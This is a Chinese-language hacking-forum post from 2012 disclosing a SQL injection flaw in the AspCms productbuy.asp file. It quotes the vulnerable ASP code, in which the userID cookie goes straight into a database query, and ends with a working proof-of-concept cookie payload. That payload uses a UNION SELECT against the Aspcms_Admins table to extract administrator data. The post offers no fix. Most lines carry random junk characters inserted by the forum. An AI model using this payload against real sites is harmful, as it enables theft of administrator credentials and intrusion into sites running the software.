好久没上土司了,上来一看发现在删号名单内.....5 g9 _" A; c8 U6 j0 M, q8 u; ]
也没啥好发的,前些天路过某个小站,用的AspCms这个系统,搜索了下,productbuy.asp这个文件存在注射,但是目标已经修补....下载了代码,很奇葩的是productbuy.asp这个文件官方虽然修补了网上提到的漏洞,但是就在同一个文件下面找到了注射漏洞。。。。。。。) Z" ]- K9 g. U2 o/ z: r Q6 Q
废话不多说,看代码:# x9 A+ b$ j- `. E% @2 h" G( \& k
2 J! D. A( i8 ], D1 t( G
<%) l# s8 {$ X$ K" j; Y/ T; F) L
4 j2 n, l: U, x1 Q+ g3 ?' s
if action = "buy" then5 p( ^. c) {' c
+ n) O8 J" m$ W/ u
addOrder()
, f- t2 p R( y- n0 e- g6 q) S& D. l5 l* U6 W' ]. e: z
else. X* I4 Q; E2 w# A+ d* Q
0 l' ~" J: l/ J* O: m! g0 @ echoContent() E; `5 q% Q! B9 s( m) W; C% J) U
9 Q6 L& {, e* j7 Q8 I0 \, q$ F2 J
end if! u4 m- p6 {* C+ V2 J
3 j+ E% m8 Z/ o! c& {7 ~1 b7 K2 ]. `. Y+ D2 ~- }; C7 x
5 h6 a' q4 C1 P$ w4 m3 H/ C
……略过4 \9 t1 L' W$ A4 U9 J T! _
9 q4 r G; B" W, z# H9 e! b
O; m1 P y \0 v: D% ?
! v. r) U! T) K
Sub echoContent()
) u1 Q" [" I& ^+ x* N9 {3 _% }/ Y3 d! t+ p" Z7 s1 X
dim id
# B# X+ l1 }# u% F, t6 b+ u9 u8 z/ p2 ~$ U4 @ X
id=getForm("id","get")5 V: a m* Z/ }9 I. `; _9 I2 P, [
4 ]) ^7 S9 G9 m H
4 P1 Q) T$ J* u1 y; v6 `( B
: g0 r8 g5 O( N: k if isnul(id) or not isnum(id) then alertMsgAndGo "请选择产品!","-1"
0 t% ]" H( w! D2 u8 \6 j1 i! @& `/ f5 ?/ r7 }" R
! q3 x: e% V) F3 s. W
. d; p; P" ?/ e+ D dim templateobj,channelTemplatePath : set templateobj = mainClassobj.createObject("MainClass.template")! E z# v7 I8 l. N
8 x6 W4 l7 c7 m8 ~ dim typeIds,rsObj,rsObjtid,Tid,rsObjSmalltype,rsObjBigtype,selectproduct
6 U n0 P. n5 l6 f( U8 A1 j" z+ n/ y) G6 j/ I0 {' ^( v3 O
Dim templatePath,tempStr$ \* n- A- a* }0 M
- `" X$ ^; f+ D; ^* f' Y- u2 e templatePath = "/"&sitePath&"templates/"&defaultTemplate&"/"&htmlFilePath&"/productbuy.html"
& e6 ]+ U( k8 F9 ]) E6 t* a8 d2 o% s2 C
/ v1 i. h6 n1 P( A" D0 e
6 w8 z! E$ R9 w& G! ?4 c set rsObj=conn.Exec("select title from aspcms_news where newsID="&id,"r1")
b5 V3 |0 a9 l% e. p
7 P# D; w `0 N selectproduct=rsObj(0)
/ F7 Y6 ]6 x2 Y& t6 [% X5 Z$ G5 n5 S u# _9 p
" u, ^' f7 f2 ]* i: _2 j w+ n
' Q5 A. U/ v# H# A- _ Dim linkman,gender,phone,mobile,email,qq,address,postcode6 R% l: o7 v7 c4 f
6 w2 u& N3 _) `6 g" z4 s if isnul(rCookie("loginstatus")) then wCookie"loginstatus",0
3 ^6 L( Q k H7 I( M! p1 g0 O1 g+ T, ~/ X. P8 u. `/ B0 G. U
if rCookie("loginstatus")=1 then # b4 N4 d. S- F) M- \" V) J
/ @# S; Y7 u( Q# ~; k1 T% H% | set rsObj=conn.Exec("select * from aspcms_Users where UserID="&trim(rCookie("userID")),"r1")
5 f& ~; G, u: w# s( [, p
) A& x( [* y. \5 B0 C# U3 ~( a b linkman=rsObj("truename"). `# Q7 w% A& V: V. N( V
* |: j, T/ c1 O4 [2 J gender=rsObj("gender")% X F1 r4 v6 M- z8 e6 k
* c' g( Z) n; e
phone=rsObj("phone")0 n2 r6 s9 j; t t9 b6 v2 p
) l- O" _' y1 ]% t: ?
mobile=rsObj("mobile")( k& Y" |% X5 r6 h; @( W/ x% m
5 {7 @, p4 b6 ?) ~8 k, M email=rsObj("email")+ m! j; o4 T3 g6 e+ G
% }+ C8 g1 h* y4 l5 y qq=rsObj("qq")
1 y+ d; m5 I. Q* T' ^% A) }2 `8 `+ O
9 {, Q ]) h' h/ j" N: h( U3 ^ address=rsObj("address")7 @* ]) w% N5 V
# O' b+ K/ Y* _5 A( {+ h. S postcode=rsObj("postcode")
. ]0 r6 v5 C6 C5 ]' j+ J% C
+ a# Y, r# C4 Z! o( A% o# X else
) d7 Z$ _1 v ]' G' I# S3 O& \4 J$ p
gender=1# o* Z* V0 H% G! N6 Z
6 ~6 R+ D" ?+ \1 G8 T d
end if8 i- y* o0 ^- V& f$ T
9 x! V' o4 {8 H5 X rsObj.close()" p% Q1 X: l: ~
: P0 p/ f" m }) d4 z8 D
" U/ C2 S/ R! [! L6 v4 Y9 T7 R. Q0 b$ [' j
with templateObj
3 V- n7 d) |/ v* Z! y: m' {6 M1 L$ W; R2 E- W: b4 a- @( y
.content=loadFile(templatePath) 4 m% K) @' Q' K) X* q4 ]8 N
& I/ i& r8 x0 u. ?
.parseHtml()) }; `( o/ \$ L8 [) ]
U9 ~ e" Q6 m( q .content=replaceStr(.content,"{aspcms:selectproduct}",selectproduct)
0 K! @" S3 g5 a: J; A9 N h- I% W2 ^$ |6 b1 p) ^2 G
.content=replaceStr(.content,"[aspcms:linkman]",linkman) * ]: \' y r0 w, Q) ?
R! ^) U/ O( G! n7 Z' ^/ K& x .content=replaceStr(.content,"[aspcms:gender]",gender)
{, c, k8 g: a
W8 |4 L) U5 |* P7 e8 z$ O& Y2 U .content=replaceStr(.content,"[aspcms:phone]",phone)
, U _0 o& o2 p; j9 l' J2 \. }) d1 V4 l
.content=replaceStr(.content,"[aspcms:mobile]",mobile) ) H9 g) G' X* [/ f/ P
& J6 l" y5 E/ _: C* E .content=replaceStr(.content,"[aspcms:email]",email)
0 L2 J1 I0 V) h. O( u+ O6 _* z; R* Y) v7 d" N% Z' G& ?
.content=replaceStr(.content,"[aspcms:qq]",qq) 8 A0 s- ]! N( V2 X! @
* a- S4 M* r2 ^4 _2 ~ R .content=replaceStr(.content,"[aspcms:address]",address)
) @6 v% ~9 z. r7 Z1 |/ X& c! z W# f: L3 K
.content=replaceStr(.content,"[aspcms:postcode]",postcode)
7 p/ W- T- `$ C3 R5 f9 o2 f) J# ~- i$ R# l) \
.parseCommon()
/ f; C4 I( K8 z" O# r+ @3 h) T6 h V
echo .content
! D# e. u: X+ z
0 e% w8 u1 p. Y2 d. r end with' J/ v$ p* J+ M8 r" J# J) a
, w' V5 h4 j' ?+ y
set templateobj =nothing : terminateAllObjects3 N/ b+ q! A/ E5 \9 |2 \. N
5 F, B1 V' i' Y4 O# X
End Sub
, X7 o7 V7 H; @, e漏洞很明显,没啥好说的
" {1 b9 w1 O' J% e6 {/ \poc: D8 x& P1 x5 i0 ^6 G* A
i1 M, o- [, m- }- L/ _/ P
javascript:alert(document.cookie="loginstatus=" + escape("1"));alert(document.cookie="userID=" + escape("1 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2 from [Aspcms_Admins]"));另外,脚本板块没权限发帖子
: F. H: D/ R6 ]* _, ^& d7 z& i# a3 K7 f# q
|
发表于 2012-12-27 08:35:05
收藏
支持
反对